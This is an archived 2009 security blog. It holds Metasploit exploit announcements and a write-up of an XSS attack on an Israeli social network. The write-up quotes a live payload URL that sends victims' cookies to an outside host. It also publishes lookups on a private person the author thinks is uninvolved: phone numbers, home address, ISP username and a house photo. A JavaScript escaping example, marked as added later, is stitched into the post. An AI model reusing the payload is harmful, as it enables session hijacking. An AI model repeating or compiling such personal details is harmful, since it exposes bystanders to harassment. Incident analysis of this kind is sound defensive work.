Posted by Trancer on Apr 30 2009

And another new exploit module for Metasploit.
This module exploits a stack-based buffer overflow in the SonicPlayer ActiveX control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2. By setting an overly long value for the ‘DiskType’ property, an attacker can overrun a buffer and execute arbitrary code.

This vulnerability was found by Carsten Eiram of Secunia Research back in April 2007. No patch or any kind of solution is offered by the vendor. Also, there was no public exploit for this vulnerability, until now ;-)

Download roxio_cineplayer.rb.
Also on Metasploit.

References:
CVE-2007-1559
BID 23412
OSVDB 34779

Categories: Exploits, Metasploit


Posted by Trancer on Apr 30 2009

Wrote a new Metasploit exploit module for the Autodesk IDrop ActiveX control heap-based memory corruption vulnerability.

This module exploits a heap-based memory corruption vulnerability in the Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160. An attacker can execute arbitrary code by triggering a heap use-after-free condition via the Src, Background and PackageXml properties.

This vulnerability was found by Elazar Broad and apparently Autodesk is not going to fix this issue… Better flip on the killbit for this one.

Download autodesk_idrop.rb.
Also on Metasploit.

References:
BID 34352
OSVDB 53265
milw0rm 8560

Categories: Exploits, Metasploit


Posted by Trancer on Apr 30 2009

The Verizon Data Breach Investigations Report for 2009 was released a few days ago.
The report summarizes the state of cyber-crime in 2008, covering the sources of data breaches, threats and attack vectors, who is getting compromised and what kind of data is being taken.
Interesting reading and a great source of statistics.
Verizon Data Breach Investigations Report 2009.

Categories: Security News


Posted by Trancer on Apr 30 2009

First of all, if you don’t know what Mekusharim is, here’s a little introduction:
Mekusharim is an Israeli social network founded in 2005 by three ambitious guys and currently has more than 1 million registered users. It’s very similar to any standard social network: it has user profile pages, albums, videos, a mailing system, and articles, polls and forums sections.
Recently Walla! acquired an additional 36 percent of Mekusharim for 4.5 million NIS (out of a 12.5 million NIS valuation), giving Walla! a total shareholding of 70 percent in Mekusharim.
I’ve had the pleasure of working with the Mekusharim guys on various security issues since 2006, mostly on finding and helping fix web application vulnerabilities.
Like most of the social networks out there, Mekusharim is a great platform for attackers to spread their malware and reach a large number of users in a short period of time; take Samy of MySpace for example.
The first time I contacted Mekusharim was right after I wrote a proof-of-concept web worm that could spread through the site, infecting user profile pages and stealing user cookies. It was written in two lines of JavaScript code and exploited a Cross-Site Scripting and a Cross-Site Request Forgery vulnerability.
But that’s water under the bridge; Mekusharim has switched systems several times (PHP -> ASP -> ASP.NET) and is much more secure nowadays. And if someone tries hacking it, I’ll be after the poor bastard :-)

Which brings us to the main subject of this post. A few days ago I got a mail message in Mekusharim from a user on my friends list, which looked like this:
(Screenshot: Mekusharim TinyURL message)

As you can see, the message subject is “:)” and the message body contains a TinyURL link.
Something smells fishy here… Previewing the link reveals that this is definitely an XSS attack:
(Screenshot: TinyURL preview)

The TinyURL link redirects to:
http://www.mekusharim.co.il/forums/ForumsList.aspx?Display=1&TagName='\';x=new%20Image();x.src="http://oritor.co.il/cgi-bin/mekusharim.php?cookie="%2Bdocument.cookie;//
(Screenshot: Cross-Site Scripting attack on Mekusharim)

The URL exploits an XSS vulnerability in the forums system (ForumsList.aspx page, TagName parameter): the injected script sends the user’s cookie to the attacker’s pre-made page located at oritor.co.il/cgi-bin/mekusharim.php.
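The shape of the payload (`'\';…//`) is worth a closer look from the defender’s side: it is built for a page that reflects the TagName value inside a JavaScript string literal and escapes single quotes with a backslash but leaves backslashes alone, so the quote escaping is itself escaped and the literal closes early. The following is an added example, not code from the original post or from Mekusharim: a naive escaper next to a context-aware encoder, and a small scanner that walks the generated script the way a JS parser would to see whether the literal still contains the whole value. The server-side template shape is an assumption; the payload is the URL-decoded TagName value from the link above.

```javascript
// Constructed sample: the URL-decoded TagName value from the TinyURL link.
const TAGNAME_PAYLOAD =
  "'\\';x=new Image();x.src=\"http://oritor.co.il/cgi-bin/mekusharim.php?cookie=\"+document.cookie;//";

// The kind of filter the payload is built to bypass: single quotes become \',
// but a backslash in the input passes through untouched, so the input's own
// "\" swallows the escaping backslash and the following quote closes the literal.
function naiveEscape(value) {
  return value.replace(/'/g, "\\'");
}

// Context-aware encoding for a value placed inside an inline <script>:
// JSON.stringify yields a valid double-quoted literal with quotes and
// backslashes escaped; the extra replacements prevent "</script>" break-outs
// and raw line terminators that would end a JS statement.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Assumed template: the page emits the parameter into a script variable.
function renderNaive(tagName) {
  return "var tagName = '" + naiveEscape(tagName) + "';";
}
function renderSafe(tagName) {
  return "var tagName = " + jsStringLiteral(tagName) + ";";
}

// Scan the first string literal in the script the way a JS parser would:
// a backslash escapes the next character, an unescaped matching quote ends it.
// Returns the literal and whatever follows it.
function splitAfterLiteral(script) {
  const start = script.search(/['"]/);
  if (start < 0) return null;
  const quote = script[start];
  let i = start + 1;
  while (i < script.length) {
    const ch = script[i];
    if (ch === "\\") { i += 2; continue; }
    if (ch === quote) {
      return { literal: script.slice(start, i + 1), trailing: script.slice(i + 1) };
    }
    i += 1;
  }
  return { literal: script.slice(start), trailing: "" }; // unterminated literal
}

// True when the only thing after the literal is the template's own ";",
// i.e. the whole untrusted value stayed inside the string.
function payloadContained(script) {
  const parts = splitAfterLiteral(script);
  return parts !== null && parts.trailing === ";";
}

// True when the browser would read back exactly the original value.
function roundTrips(value) {
  const parts = splitAfterLiteral(renderSafe(value));
  return parts !== null && JSON.parse(parts.literal) === value;
}

console.log("naive escaping contains payload:", payloadContained(renderNaive(TAGNAME_PAYLOAD)));
console.log("JSON-style encoding contains payload:", payloadContained(renderSafe(TAGNAME_PAYLOAD)));
```

With the naive escaper the scanner stops at the third character of the reflected value and reports `x=new Image();…` as live code following the literal; with the JSON-style encoder the literal runs to the end and decodes back to the original value. The more robust fix is to not place untrusted data inside script at all (for example, put it in a data attribute and read it with DOM APIs), but where a page must emit it into script, encoding for that exact context is the minimum.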

The first thing that crossed my mind was getting some information on the oritor.co.il domain and its owner. Running a quick whois on the domain reveals a lot of useful information:

domain: oritor.co.il
descr: orit bokobza
descr: ezra 20
descr: rishon leztion
descr: 75515
descr: Israel
phone: +972 50 8836620
e-mail: orit123 AT bezeqint.net
admin-c: LD-OB3906-IL
tech-c: LD-OB3906-IL
zone-c: LD-OB3906-IL
nserver: ns1.xoox.co.il
nserver: ns2.xoox.co.il
validity: 16-12-2009
status: Transfer Locked
changed: domain-registrar AT isoc.org.il 20081216 (Assigned)
person: orit bokobza
address: ezra 20
address: rishon leztion
address: 75515
address: Israel
phone: +972 50 8836620
e-mail: orit123 AT bezeqint.net
nic-hdl: LD-OB3906-IL
changed: domain-registrar AT isoc.org.il 20081216
registrar name: LiveDns Ltd
Registrar info: http://domains.livedns.co.il
% Rights to the data above are restricted by copyright.

The domain oritor.co.il is registered to Orit Bokobza of Ezra 20 street, Rishon Leztion. Orit’s cellular phone number is 0508836620 (Pelephone) and she registered the domain using her ISP email address, which reveals that she’s a Bezeq International ISP customer under the username orit123. We also see that the domain’s name servers belong to xoox.co.il; we’ll get to that later.
Digging deeper using b144.co.il, searching for Orit Bokobza from Rishon Leztion gives one identical match (same address and house number), revealing that she has another cellular phone number – 0545455382 (Orange):
(Screenshot: b144 search)

b144 also gives us a map to the house and a picture of the house itself:
(Screenshot: b144 map and house picture)

Cool.
Digging further, Googling her email address and retrieving additional information from her web site and posts in forums she’s active in reveals that she’s some kind of personal holistic trainer and has a master’s in energetic healing.
At this point I’m quite sure that she’s got nothing to do with this XSS attack on Mekusharim, but it’s a good place to start investigating and tracking down the attacker. My guess is that her site is being used by the attacker, who compromised the hosting server.
Let’s take a look at which web sites are hosted on the same server using the Live Search ip: search feature:
http://search.live.com/results.aspx?q=ip:91.198.129.47

We see that this hosting server also hosts xoox.co.il, which is the DNS provider of oritor.co.il as resolved from the whois. Something tells me the holistic master has no technical skills at all, so the xoox.co.il administrator will be a better person to talk to for additional information about the XSS attack.
Running whois on xoox.co.il:

domain: xoox.co.il
descr: Shlomi Rabia
descr: Agibor Almoni 13
descr: Tel Aviv
descr: 67421
descr: Israel
phone: +972 50 7809313
e-mail: xoox AT bezeqint.net
admin-c: II-SR5955-IL
tech-c: II-SR5955-IL
zone-c: II-SR5955-IL
nserver: ns1.xoox.co.il
nserver: ns10.rehost.co.il
validity: 14-10-2010
status: Transfer Allowed
changed: domain-registrar AT isoc.org.il 20041014 (Assigned)
changed: domain-registrar AT isoc.org.il 20041017 (Changed)
changed: domain-registrar AT isoc.org.il 20041229 (Changed)
changed: domain-registrar AT isoc.org.il 20070510 (Changed)
changed: domain-registrar AT isoc.org.il 20070805 (Changed)
changed: domain-registrar AT isoc.org.il 20070809 (Changed)
changed: domain-registrar AT isoc.org.il 20080731 (Changed)
changed: domain-registrar AT isoc.org.il 20080731 (Changed)
changed: domain-registrar AT isoc.org.il 20080804 (Changed)
changed: domain-registrar AT isoc.org.il 20081026 (Changed)
person: Shlomi Rabia
address: Agibor Almoni 13
address: Tel Aviv
address: 67421
address: Israel
e-mail: xoox AT bezeqint.net
nic-hdl: II-SR5955-IL
changed: domain-registrar AT isoc.org.il 20041014
registrar name: Israel Internet Association ISOC-IL
Registrar info: www.isoc.org.il
% Rights to the data above are restricted by copyright.

This provides enough information to contact the right person and conduct further investigation.

I gave all this information to the Mekusharim guys a few hours after the attack started; hopefully this is all the information they need to stop the attack as soon as possible. Meanwhile, the XSS vulnerability got fixed.

Categories: Web Application Security


Posted by Trancer on Apr 13 2009

For the past few days two web worms have been spreading through Twitter, the popular social micro-blogging utility. The first worm, called the “StalkDaily” worm, started spreading on Saturday, infecting user profile pages, stealing users’ browser cookies and posting unwanted tweets. A second variant, called the “Mikeyy” worm, started spreading on Sunday and does pretty much the same.
The worms used Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities to spread, which the Twitter guys have already closed.
Both worms were created by Michael “Mikeyy” Mooney, a 17-year-old. You can read an interview with Mooney on CNET News.

Here is the JavaScript code of both the “StalkDaily” worm and the “Mikeyy” worm, for educational purposes.

Further reading:
Twitter Blog: Wily Weekend Worms.
F-Secure – Twitter worm outbreak over Easter.
Twitter Worm Analysis by Ryan Barnett.

Categories: Malware


Posted by Trancer on Apr 09 2009

The Microsoft Security Intelligence Report volume 6 (July through December 2008) has been released.
The report summarizes security and exploit trends, the state of internet cyber-crime, and vulnerabilities in Microsoft products and their in-the-wild exploitation for the second half of 2008.
I find the report very interesting and I strongly recommend reading it.
Microsoft Security Intelligence Report volume 6.

Categories: Security News


Posted by Trancer on Apr 09 2009

Since Y2Hack (2000) and Y2Hack4 (2004) there has been no hacking convention held in Israel. That’s just sad, because Israel is a small country with a lot of great minds in the field, and I think having such an event at least once a year will contribute a lot to the Israeli hacking community and take it a few steps forward.
This year, thanks to the ambitiousness of Yaniv Miron, we’ll get a hacking convention in Israel:

IL.Hack 2009 - Israeli Hacking Convention

The convention will be held on 24/05/2009 at the American Zionist House in Tel Aviv and will include:

  • Hacking lectures.
  • Information security lectures.
  • Hacking Wargames.
  • Book Crossing.
  • Pizzas!

Go sign up! For further information check out the IL.Hack 2009 web site (Hebrew), or the IL.Hack 2009 English information page.
You can also confirm your attendance at the convention’s Facebook event.

Note that more sponsors are needed, so if some of the readers can arrange something, please contact Yaniv Miron – info@ilhack.org.

Hope to see you there :-)

Categories: Security News

